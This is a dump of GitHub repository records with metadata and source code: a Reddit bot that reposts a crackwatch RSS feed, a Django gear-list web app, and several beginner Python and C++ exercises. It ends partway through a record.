"alpha_fraction": 0.6043360233306885,
"alphanum_fraction": 0.6131436228752136,
"avg_line_length": 27.365385055541992,
"blob_id": "37219c6291d6e5007fca0013fab3314d87be2cc2",
"content_id": "abc8c8b5fbed5b78a84c2cdc2cc8ce8987de73a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1476,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 52,
"path": "/post_rss_feed_to_subreddit.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "import praw\nimport datetime\nimport time\nimport feedparser\n\ndef generate_existing(target_subreddit,existing_posts):\n for submission in target_subreddit.hot(limit=1000):\n existing_posts.append(submission.title)\n return existing_posts\n\ndef main():\n reddit = praw.Reddit(client_id='',\n client_secret='',\n password='',\n username='guitar_remover_bot',\n user_agent='my user agent')\n\n target_subreddit = reddit.subreddit('7330313')\n\n username = 'guitar_remover_bot'\n \n feed = feedparser.parse('http://api.crackwatch.com/rss/cracks.xml')\n\n existing_posts = []\n\n\n\n while True:\n post_link(existing_posts, target_subreddit, username)\n time.sleep(60)\n\n\ndef post_link(existing_posts, target_subreddit, username):\n feed = feedparser.parse('http://api.crackwatch.com/rss/cracks.xml')\n\n generate_existing(target_subreddit,existing_posts)\n\n for post in feed.entries:\n if post.title in existing_posts:\n print(post.title + \" exists!\")\n\n if post.title not in existing_posts:\n print(\"Posting \" + post.title)\n target_subreddit.submit(title=post.title, url=post.link)\n\n for queue_submission in target_subreddit.mod.modqueue(limit=None):\n if queue_submission.author == username:\n queue_submission.mod.approve()\n\n\nif __name__ == '__main__':\n main()\n\n"
}
] | 8 |
irfa89/AlgoDS
|
https://github.com/irfa89/AlgoDS
|
1ae1b75a85182c7accc26b601d3a3c43002c64a7
|
c09803cd9627a582b59b04ec985721641af24fef
|
72055786bd899e285e18a2fab19763814f6380b4
|
refs/heads/master
| 2020-04-13T22:50:57.670225 | 2018-12-29T07:54:28 | 2018-12-29T07:54:28 | 163,490,019 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7854785323143005,
"alphanum_fraction": 0.8250824809074402,
"avg_line_length": 17.9375,
"blob_id": "15dbfc1f86c3c82d1f4b7fccc0e52433c10bf795",
"content_id": "7fdbb03acfc6454839845950b60adcbd1f6c30fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 303,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 16,
"path": "/LinkedList_DS/App.py",
"repo_name": "irfa89/AlgoDS",
"src_encoding": "UTF-8",
"text": "from LinkedList_DS.LinkedList import LinkedList\n\nlinkedList = LinkedList()\n\nlinkedList.insertEnd(12)\nlinkedList.insertEnd(13)\nlinkedList.insertEnd(14)\nlinkedList.insertEnd(7)\nlinkedList.insertEnd(9)\nlinkedList.insertStart(10)\n\nlinkedList.traverseList()\n\nlinkedList.remove(14)\n\nlinkedList.traverseList()\n"
}
] | 1 |
ashlibaldwin/polls
|
https://github.com/ashlibaldwin/polls
|
09d6e0a76ffe79d778b88f95a801f4ffb6df75f8
|
5ac01f32388a1d21a2621f05d0630eadc6e4f779
|
101e5268a58ed7407e42506aa575f55332ea7909
|
refs/heads/master
| 2021-04-18T23:28:58.861027 | 2019-04-16T03:26:51 | 2019-04-16T03:26:51 | 58,057,009 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8060606122016907,
"alphanum_fraction": 0.8060606122016907,
"avg_line_length": 22.428571701049805,
"blob_id": "f4ec57775608f71a2f1d647832f22593b17bc241",
"content_id": "883a48bca5ef04631353f73abf56512ae0dea772",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 165,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 7,
"path": "/gear/admin.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import List, Item, UserProfile\n\n\nadmin.site.register(UserProfile)\nadmin.site.register(List)\nadmin.site.register(Item)\n\n"
},
{
"alpha_fraction": 0.7319034934043884,
"alphanum_fraction": 0.7319034934043884,
"avg_line_length": 20.941177368164062,
"blob_id": "e24aebd06437d2cbaba756add0dec2a19160d218",
"content_id": "77fb6b13779bd3c4aeb3cf8b30e811b3cbe909cb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 373,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 17,
"path": "/gearlist/deploy_settings/__init__.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "import dj_database_url\nfrom ..settings import *\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG \nSSLIFY_DISABLE = False\n\nALLOWED_HOSTS = [\n'localhost',\n'.pythonanywhere.com',\n'.mygearroom.com',\n]\n\nSECRET_KEY = get_env_variable(\"SECRET_KEY\")\nEMAIL_HOST_PASSWORD = get_env_variable(\"EMAIL_HOST_PASSWORD\")\ndb_from_env = dj_database_url.config()\nDATABASES[\"default\"].update(db_from_env)\n"
},
{
"alpha_fraction": 0.6289277076721191,
"alphanum_fraction": 0.6304239630699158,
"avg_line_length": 28.04347801208496,
"blob_id": "4205ad61d102cbcc1fc5df8df01456e85ed2d49e",
"content_id": "6179d904f0b58cf4c210fb62a1770f7b35ce7c99",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2005,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 69,
"path": "/gear/forms.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom .models import List, Item, UserProfile, User\nfrom django.contrib.auth import authenticate\n\n\nclass ListForm(forms.ModelForm):\n\n class Meta:\n model = List\n fields = ('title',)\n exclude = ('user',)\n\n\nclass ItemForm(forms.ModelForm):\n\n class Meta:\n model = Item\n fields = ('title',)\n exclude = ('todo_list',)\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput())\n\n class Meta:\n model = User\n fields = ('username', 'email', 'password')\n\n def clean_email(self):\n email = self.cleaned_data.get('email')\n username = self.cleaned_data.get('username')\n if email and User.objects.filter(email=email).exclude(username=username).count():\n raise forms.ValidationError(u'Email address must be unique.')\n return email\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(\n max_length=255, \n required=True, \n label='',\n widget=forms.TextInput(attrs={'placeholder': 'username'})\n )\n password = forms.CharField(\n required=True, \n label='',\n widget=forms.PasswordInput(attrs={'placeholder':'password'})\n )\n\n def clean(self):\n username = self.cleaned_data.get('username')\n password = self.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if not user or not user.is_active:\n raise forms.ValidationError(\"Sorry, that login was invalid. Please try again.\")\n return self.cleaned_data\n\n def login(self, request):\n username = self.cleaned_data.get('username')\n password = self.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n return user\n \n\nclass UserProfileForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('website', 'picture')\n\n"
},
{
"alpha_fraction": 0.5666666626930237,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 19,
"blob_id": "42cbcc80018be121b95118ec82534d2b477a6cb9",
"content_id": "001e3bfbbd0e0bd95ca819b29a6e5d442401bafb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 180,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 9,
"path": "/requirements.txt",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "dj-database-url==0.5.0\nDjango==2.2\ndjango-password-reset==2.0\ndjango-sslify==0.2.7\ndjango-webpack-loader==0.6.0\nmysqlclient==1.4.2.post1\nPillow==6.0.0\npytz==2018.9\nsqlparse==0.3.0\n"
},
{
"alpha_fraction": 0.6828571557998657,
"alphanum_fraction": 0.6828571557998657,
"avg_line_length": 30.81818199157715,
"blob_id": "e4f13b87af963eca12d2e1e01bf984fb6c41abf6",
"content_id": "12e222161204986d8d12558421a6a0ae2c744206",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 350,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 11,
"path": "/gearlist/urls.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom gear import views\n\nurlpatterns = [\n url(r'^gear/', include('gear.urls', namespace=\"gear\")),\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.home, name='home'),\n url(r'^passwordreset/', include('password_reset.urls')),\n]\n"
},
{
"alpha_fraction": 0.6458852887153625,
"alphanum_fraction": 0.6458852887153625,
"avg_line_length": 32.41666793823242,
"blob_id": "868d82f76507bb5ffea085ca08e5cf27f89d55f5",
"content_id": "472d1d9fe8c1e8f52ef86b922ff481f95f5b02f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 401,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 12,
"path": "/gear/templates/gear/delete_list.html",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "{% extends 'base.html' %}\n% load staticfiles %}\n{% block content %}\n<div class=\"text-center\">\n\t<strong>Are you sure you want to delete {{ object.title }}?</strong>\n\t<form method=\"post\">\n\t {% csrf_token %}\n\t <button type=\"submit\" class=\"btn btn-danger\">I'm sure</button>\n\t <input class=\"btn btn-info\" type=\"button\" value=\"Nevermind\" onclick=\"window.history.back()\" />\n\t</form>\n</div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.736213207244873,
"alphanum_fraction": 0.7426470518112183,
"avg_line_length": 30.05714225769043,
"blob_id": "d64ab1452151dcee9e467d620e51d6e8f3a0cbc2",
"content_id": "4ddf519ed80832bbb8532806d6535ce1f1485025",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1088,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 35,
"path": "/gear/models.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nimport datetime\nfrom django.utils import timezone\nfrom django.urls import reverse\nfrom django.contrib.auth.models import User\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, related_name='user', on_delete=models.CASCADE)\n website = models.URLField(blank=True)\n picture = models.ImageField(upload_to='profile_images', blank=True)\n\n def __unicode__(self):\n return self.user.username\n\n\nclass List(models.Model): \n title = models.CharField(\"\", max_length=250, unique=False, editable=True) \n user = models.ForeignKey(User, blank=True, on_delete=models.CASCADE)\n \n def __str__(self): \n return self.title\n\n\nclass Item(models.Model): \n title = models.CharField(\"\", max_length=250, unique=False) \n created_date = models.DateTimeField(default=datetime.datetime.now) \n todo_list = models.ForeignKey(List, on_delete=models.CASCADE)\n checked = models.BooleanField(default=False)\n\n def __str__(self): \n return self.title \n"
},
{
"alpha_fraction": 0.7158234715461731,
"alphanum_fraction": 0.7308934330940247,
"avg_line_length": 18.12371063232422,
"blob_id": "c63d63d9a9f3ac537340c803ec84bfa89c28a2ca",
"content_id": "f1aa0675e267fdd70bedc411f60ed14b1fff2bca",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1858,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 97,
"path": "/README.md",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "# GearListApp\nDjango app for making lists about stuff\n\n\n#Running locally\n\n### requirements\n- pip\n\n`python3 -m pip install --user --upgrade pip`\n\n- virtual env\n\n`python3 -m pip install --user virtualenv`\n\n\n### steps\n1. Navigate to the project root\n2. start a new virtual environment \n\n`python3 -m virtualenv env`\n\n3. install mysql dmg file from the [MySQL community server](https://dev.mysql.com/downloads/mysql/)\n- once downloaded, double click to open and install the file, follow the prompts\n- start the server\n\n\n4. add the following line to your bash profile:\n\n`export PATH=$PATH:/usr/local/mysql/bin`\n\n5. restart the command line & naviate to the project root\n\n6. drop into mysql shell\n\n`$ mysql -u root -p`\n\n\n7. create the database\n\n`CREATE DATABASE gearlist;`\n\n`CREATE USER 'admin'@'localhost' IDENTIFIED BY 'password1';`\n\n`GRANT ALL PRIVILEGES ON gearlist.* TO 'admin'@'localhost';`\n\n`FLUSH PRIVILEGES;`\n\n`quit`\n\n\n8. Create a superuser\n\n`python manage.py createsuperuser`\n\n\n9. activate the virtual env\n\n`source env/bin/activate`\n\n10. install requirements\n\n`pip install -r requirements.txt`\n\n11. migrate\n\n`python manage.py migrate`\n\n12. start the server:\n\n`python manage.py runserver`\n\nAt this point the server should start and you can view the website locally at http://127.0.0.1:8000/\n\n### Errors & troubleshooting:\n\n- I got error like 'library not loaded, so I did this and it seemed to work:\n\n`export DYLD_LIBRARY_PATH=\"/usr/local/mysql/lib:${DYLD_LIBRARY_PATH}\"`\n\n`export PATH=\"/usr/local/mysql/lib:${PATH}\"`\n\n- if new packages are added, run \n\n`pip install -r requirements.txt`\n\n- sometimes deleting env and creating a new one fixes stuff\n\n- database image not found:\n`export DYLD_LIBRARY_PATH=/usr/local/mysql/lib/`\n\n\n### To start the server next time, from the project root just run\n\n`source env/bin/activate`\n\n`python manage.py runserver`\n\n\n\n"
},
{
"alpha_fraction": 0.6165736317634583,
"alphanum_fraction": 0.6185057759284973,
"avg_line_length": 30.472972869873047,
"blob_id": "332ea42eb8b0c918912e2a60cd224713daa371f2",
"content_id": "566a7812371ccce14c45a5220d66bb354332a13d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4658,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 148,
"path": "/gear/views.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse, reverse_lazy\nfrom django.views import generic\nfrom django.shortcuts import redirect\nfrom .models import List, Item, UserProfile\nfrom .forms import ItemForm, ListForm, UserProfileForm, UserForm, LoginForm\nfrom django.views.generic.edit import DeleteView # this is the generic view\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\nimport logging\n\n\ndef home(request):\n return render(request, \"gear/home.html\", {})\n\n\n@login_required\ndef profile(request):\n return render(request, 'gear/profile.html', {})\n\n\n@login_required\ndef list(request):\n username = None\n if not request.user.is_authenticated:\n return HttpResponseRedirect('/')\n\n if request.user.is_authenticated:\n lists = List.objects.filter(user=request.user)\n form = ListForm(request.POST or None)\n if request.method == \"POST\":\n form = ListForm(request.POST)\n if form.is_valid():\n list = form.save(commit=False)\n list.user = request.user\n list.save()\n return redirect('gear:list_detail', pk=list.pk)\n else:\n form = ListForm()\n\n return render(request, 'gear/list.html', {'lists': lists, 'form': form})\n\n@login_required\ndef list_detail(request, pk):\n lists = List.objects.get(user=request.user, pk=pk)\n items =lists.item_set.all()\n form = ItemForm\n if request.method == \"POST\":\n form = ItemForm(request.POST)\n if form.is_valid():\n item = form.save(commit=False)\n item.todo_list = lists\n item.save()\n form = ItemForm\n return redirect('gear:list_detail', pk=pk)\n else:\n form = ItemForm()\n\n return render(request, 'gear/list_detail.html', {'items': items, 'form': form, 'lists':lists})\n\n\ndef update_item(request, item_id):\n if request.method == 'POST': \n obj = Item.objects.get(pk=item_id)\n if obj.checked:\n obj.checked = False\n else:\n obj.checked = True\n \n obj.save()\n return JsonResponse({'result':'ok'})\n else:\n return JsonResponse({'result':'nok'})\n\n\ndef delete_list(request, pk):\n list = get_object_or_404(List, pk=pk)\n if request.method=='POST':\n list.delete()\n return redirect('gear:list')\n\n return render(request, 'gear/delete_list.html', {'object':list})\n\n\ndef delete_item(request, pk):\n item = get_object_or_404(Item, pk=pk)\n if request.method=='POST':\n item.delete()\n list_id = item.todo_list.id\n list_url = \"/gear/list_detail/\" +str(list_id)\n return redirect(list_url)\n \n return render(request, 'gear/delete_item.html', {'object':item})\n\n\ndef register(request):\n registered = False\n if request.method == 'POST':\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileForm(data=request.POST)\n if user_form.is_valid() and profile_form.is_valid():\n user = user_form.save()\n user.set_password(user_form.cleaned_data['password'])\n user.save()\n profile = profile_form.save(commit=False)\n profile.user = user\n\n if 'picture' in request.FILES:\n profile.picture = request.FILES['picture']\n profile.save()\n registered = True\n username = request.POST['username']\n password = request.POST['password']\n login(request, user)\n \n return HttpResponseRedirect(\"/\")\n else:\n print (user_form.errors, profile_form.errors)\n else:\n user_form = UserForm()\n profile_form = UserProfileForm()\n\n return render(request,\n 'gear/register.html',\n {'user_form': user_form, 'profile_form': profile_form, 'registered': registered})\n\n\ndef user_login(request):\n form = LoginForm(request.POST or None)\n if request.POST and form.is_valid():\n user = form.login(request)\n if user:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect('/gear/list')\n else:\n return HttpResponse(\"Your account is disabled.\")\n return render(request, 'gear/login.html', {'login_form': form })\n\n\n@login_required\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect('/')\n"
},
{
"alpha_fraction": 0.6264045238494873,
"alphanum_fraction": 0.6264045238494873,
"avg_line_length": 38.61111068725586,
"blob_id": "986033dcc8efca265b2fe40d87191b69106c964a",
"content_id": "c9d3d5beb9399718bc294ccf7fd6db5c0a349805",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 712,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 18,
"path": "/gear/urls.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom django.conf.urls import include\n\nfrom . import views\n\napp_name = 'gear'\n\nurlpatterns = [\n url(r'^profile/', views.profile, name='profile'),\n url(r'^list/', views.list, name='list'),\n url(r'^list_detail/(?P<pk>\\d+)/$', views.list_detail, name='list_detail'),\n url(r'^delete/(?P<pk>\\d+)/$', views.delete_item, name=\"delete_item\"),\n url(r'^delete_list/(?P<pk>\\d+)/$', views.delete_list, name=\"delete_list\"),\n url(r'^register/$', views.register, name='register'),\n url(r'^login/$', views.user_login, name='login'),\n url(r'^logout/$', views.user_logout, name='logout'),\n url(r'^update/item/(?P<item_id>\\d+)/$', views.update_item, name=\"update_item\"),\n]"
}
] | 10 |
jackey/PFetion
|
https://github.com/jackey/PFetion
|
27a8f9723468c836df6576d15648d7590fe4101e
|
860d16f43137c2f13e863ffc6000456c2397616e
|
bcc12022ad7ca148eff3938d1690ae03aea36563
|
refs/heads/master
| 2020-12-25T14:05:51.213755 | 2013-10-15T08:49:07 | 2013-10-15T08:49:07 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5659751296043396,
"alphanum_fraction": 0.5734440088272095,
"avg_line_length": 33.382354736328125,
"blob_id": "7993e7b9a5b711d5c22f516aa28c17316c5a801a",
"content_id": "944785701b5496e914be4d3a1920db96173eea82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1207,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 34,
"path": "/setup.py",
"repo_name": "jackey/PFetion",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\r\nfrom setuptools import setup\r\nimport PFetion\r\n\r\nsetup(\r\n name = PFetion.__name__,\r\n version = PFetion.__version__,\r\n packages = ['PFetion'],\r\n keywords = 'library mobile fetion',\r\n author = PFetion.__author__,\r\n author_email = '[email protected]',\r\n\r\n url = PFetion.__website__,\r\n description = 'A simple python lib for WapFetion',\r\n long_description = open(\"README.md\").read(),\r\n license = PFetion.__license__,\r\n classifiers = [\r\n 'Development Status :: 4 - Beta',\r\n 'Environment :: Console',\r\n 'Intended Audience :: Developers',\r\n 'License :: OSI Approved :: MIT License',\r\n 'Natural Language :: English',\r\n 'Natural Language :: Chinese (Simplified)',\r\n 'Operating System :: OS Independent',\r\n 'Programming Language :: Python :: 2',\r\n 'Programming Language :: Python :: 2.5',\r\n 'Programming Language :: Python :: 2.6',\r\n 'Programming Language :: Python :: 2.7',\r\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content :: CGI Tools/Libraries',\r\n 'Topic :: Utilities',\r\n 'Topic :: Software Development :: Libraries :: Python Modules',\r\n ],\r\n zip_safe = False,\r\n)\r\n\r\n"
},
{
"alpha_fraction": 0.649193525314331,
"alphanum_fraction": 0.7177419066429138,
"avg_line_length": 21.545454025268555,
"blob_id": "fdef912f71c5a5498ec8d9cc8dd3ee33cea89c57",
"content_id": "b6c061f5671f0fa09b8177ba4f0eae7b4d756341",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 11,
"path": "/bin/sms.py",
"repo_name": "jackey/PFetion",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys,os\n\nAPP_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(APP_PATH);\n\nfrom PFetion import Fetion\n\nfetion = Fetion('15821121753', 'lovexx1314')\n\nfetion.send(sys.argv[1], sys.argv[2])\n"
},
{
"alpha_fraction": 0.6209385991096497,
"alphanum_fraction": 0.7075812220573425,
"avg_line_length": 26.799999237060547,
"blob_id": "006948af940a85fd60305905f8422f578db2fbfd",
"content_id": "3d4c7df6146976b4d2eae2b9be51bff0526eff3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 10,
"path": "/test/simplesend.py",
"repo_name": "jackey/PFetion",
"src_encoding": "UTF-8",
"text": "import sys,os\n\nAPP_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(APP_PATH);\n\nfrom PyWapFetion import Fetion, send2self, send\n\nto = \"15821121753\"\nsend2self(\"15821121753\", \"xxxx\", \"LiXiu, Ni kan dao le ma ?\");\nprint \"Sent Message To %s\" %(to)"
},
{
"alpha_fraction": 0.6426858305931091,
"alphanum_fraction": 0.6570743322372437,
"avg_line_length": 19.850000381469727,
"blob_id": "dbeeb631690e92b626518be18cc5ef4c36c212df",
"content_id": "0e206bc50f0121ac85592f31d5d11236220b5ec2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 20,
"path": "/PFetion/__init__.py",
"repo_name": "jackey/PFetion",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\nfrom __future__ import with_statement\n\n__name__ = 'PFetion'\n__version__ = '0.9.4'\n__author__ = 'whtsky'\n__website__ = 'https://github.com/jackey/PFetion'\n__license__ = 'MIT'\n\nfrom Fetion import Fetion\n\n\ndef send2self(mobile, password, message):\n x = Fetion(mobile, password)\n x.send2self(message)\n\n\ndef send(mobile, password, to, message):\n x = Fetion(mobile, password)\n x.send(to, message)\n"
}
] | 4 |
EricDittus/csci127-assignments
|
https://github.com/EricDittus/csci127-assignments
|
931d681dec9a959a06e90fc2ea3b458fd7d2e2d7
|
85ad418c3481ea1692816ffc00d8dd4e3cffff58
|
60e70f6dd98d84423aadab4f0ad68af165910969
|
refs/heads/master
| 2021-08-22T22:23:49.772209 | 2018-12-20T15:34:24 | 2018-12-20T15:34:24 | 147,669,142 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5194805264472961,
"alphanum_fraction": 0.5627705454826355,
"avg_line_length": 20,
"blob_id": "76aabcd95cc6be849c9ad24761f16bfc5b289633",
"content_id": "3f8c56fbdb2320c1840bee16b3cfc8c6a43fffec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 22,
"path": "/final_1/sum.cpp",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n\nint sum;\n\nint sumofsquares(int a, int b){\n int sum = 0;\n for(int i = a; i<=b; i++){\n sum = sum + (i^2);\n }\n return sum;\n}\n\nint main()\n{\n std::cout << \"sumofsquares function test:\\n\\n\";\n std::cout << \"Range 1 to 10\\n\";\n std::cout << sumofsquares(1,10) << std::endl;\n std::cout << \"Range 3 to 5\\n\";\n std::cout << sumofsquares(3,5) << std::endl;\n std::cout << \"Range 20 to 21\\n\";\n std::cout << sumofsquares(20,21) << std::endl;\n}\n"
},
{
"alpha_fraction": 0.5488929748535156,
"alphanum_fraction": 0.5544280409812927,
"avg_line_length": 22.021276473999023,
"blob_id": "741cb07f7f8e59be3a931d400b5b7216c63f5b9d",
"content_id": "581b708dc879e73923df5e4825afb588e5035d02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1084,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 47,
"path": "/final_2/dict.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "\n\ndef addline(d,line):\n my_list = []\n line=line.lower()\n new_line = line.split()\n i=0\n while i <= len(new_line)-1:\n word = new_line[i]\n char=word[0]\n if char in d:\n my_list=d[char]\n my_list.append(word)\n d[char]=my_list\n else:\n my_list = [word]\n d[char]= my_list\n i += 1\n return d\n\nprint(addline({},\"somewhere ooover the rainbooow, way up higghhh\"))\nprint(addline({},\"THERE'S A LAND THAT I DREAM OF\"))\nprint(addline({},\"oNcE In A lUlLuBy\"))\n\n\ndef main():\n d={}\n addline(d,\"apples and octopi love water\")\n addline(d,\"if i were a fish, I would Hate to Swim\")\n addline(d,\"How much Wood\")\n addline(d,\"could a Woodchuck chuck\")\n addline(d,\"if a Woodchuck could chuck wood\")\n return d\n\nprint(main())\n\ndef spellcheck(d,word):\n word=word.lower()\n if word[0] in d:\n if word in d[word[0]]:\n return True\n else:\n return False\n\n else:\n return False\n\nprint(spellcheck(main(),'gotcha'))\nprint(spellcheck(main(),'apples'))\n"
},
{
"alpha_fraction": 0.4595842957496643,
"alphanum_fraction": 0.5265588760375977,
"avg_line_length": 25.8125,
"blob_id": "553e27541ff262e061034049cf9d055cb639ce14",
"content_id": "acb351dfae703918803ea9d9c97c50d6542a3395",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 16,
"path": "/lab_04/apple.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def countApplesAndOranges(s,t,a,b,apples,oranges):\n num_apples=0\n num_oranges=0\n for d in apples:\n d = a + d\n if s<=d and d<=t:\n num_apples +=1\n for d in oranges:\n d = b + d\n if t>=d and s<=d:\n num_oranges +=1\n print(num_apples)\n print(num_oranges)\n \ncountApplesAndOranges(7,10,4,12,[2,3,-4],[3,-2,-4])\ncountApplesAndOranges(-2,-5,-6,6,[-2,3,10,15],[11,-2]) \n"
},
{
"alpha_fraction": 0.47058823704719543,
"alphanum_fraction": 0.47058823704719543,
"avg_line_length": 15,
"blob_id": "2a640272a2cb7385f194e1a63fbf36899bade3a9",
"content_id": "542e6399206a92943fec1185d8708d7433a33577",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 17,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 1,
"path": "/testing/README.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "Eric Dittus & Emily Fang\n"
},
{
"alpha_fraction": 0.42032966017723083,
"alphanum_fraction": 0.430402934551239,
"avg_line_length": 18.48214340209961,
"blob_id": "a80eae934a613f661cc50c31dca54d6652b354db",
"content_id": "39f0235a52ad0c73c2f84a048ed392d4cd4f82b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1092,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 56,
"path": "/lab_04/lady.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def happy_ladybugs(L):\n items = uniqueitems(L)\n \n if '_' in items:\n items.remove('_')\n for i in items:\n count = 0\n for j in L:\n if i == j:\n count += 1\n if count <= 1:\n return 'no'\n return 'yes'\n \n elif Full(L):\n return 'yes'\n \n else:\n return 'no'\n \n \ndef Full(L): \n \n previous = L[0]\n consecutive = 1\n if len(L) == 1:\n return False\n \n for i in range(1,len(L)):\n if L[i] == previous:\n consecutive += 1\n elif consecutive > 1:\n if i == len(L) -1:\n return False\n previous = L[i]\n consecutive = 1\n else:\n return False\n return True\n\n\ndef uniqueitems(l):\n \n unique = []\n for i in l: \n if i not in unique:\n unique.append(i)\n \n return unique\n\n\ngames = ['CBAABC','CCAABB','BBBBBB','_','A_B_AA','LFGG','ALACABAZLE',\n 'SS_____SSAA_MMM']\n\nfor each in games:\n print(each,' ',happy_ladybugs(each)) \n"
},
{
"alpha_fraction": 0.48201438784599304,
"alphanum_fraction": 0.48201438784599304,
"avg_line_length": 21.600000381469727,
"blob_id": "91d9603e708b38e8ba032d5ae7b38c1afd64d855",
"content_id": "859b038e8f490cf6f3e78c5c98a21d4d7dd61480",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 5,
"path": "/hw_04/chinese.py",
